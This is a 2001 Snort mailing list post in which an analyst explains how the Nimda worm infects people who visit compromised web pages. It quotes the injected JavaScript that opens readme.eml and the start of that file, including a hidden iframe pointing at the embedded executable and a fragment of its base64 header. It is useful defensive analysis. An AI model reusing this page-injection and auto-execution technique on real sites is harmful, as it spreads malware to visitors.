Snort mailing list archives

Re: nimda

From: "Sean Wheeler" <S.Wheeler () netprotect ch>
Date: Wed, 19 Sep 2001 13:46:08 +0200

Figuring out how this is happening :

A user noticed this same effect while browsing the net, I jumped on a unix box and tried to figure out what was
happening.

First downloaded the main html page : wget xxx.xxx.xxx.xxx bottom of the index.html reads :
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

Grabbed the readme.eml :  wget xxx.xxx.xxx/readme.eml
and there she sits, the readme.exe inside the readme.eml

It seems the *.eml extention is associated with Outlook, and thus the readme.eml is processed by Outlook when the
javascript is executed and the infection occurs just as if you had received it via e-mail.

Below it the fist portion of the readme.eml file :

--====_ABC1234567890DEF_====

--====_ABC0987654321DEF_====

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v

Pretty scary stuff !!

If this has been covered already sorry for the repetition, just got back from the chaos of international airports, have
not got though all the mail yet.

Sean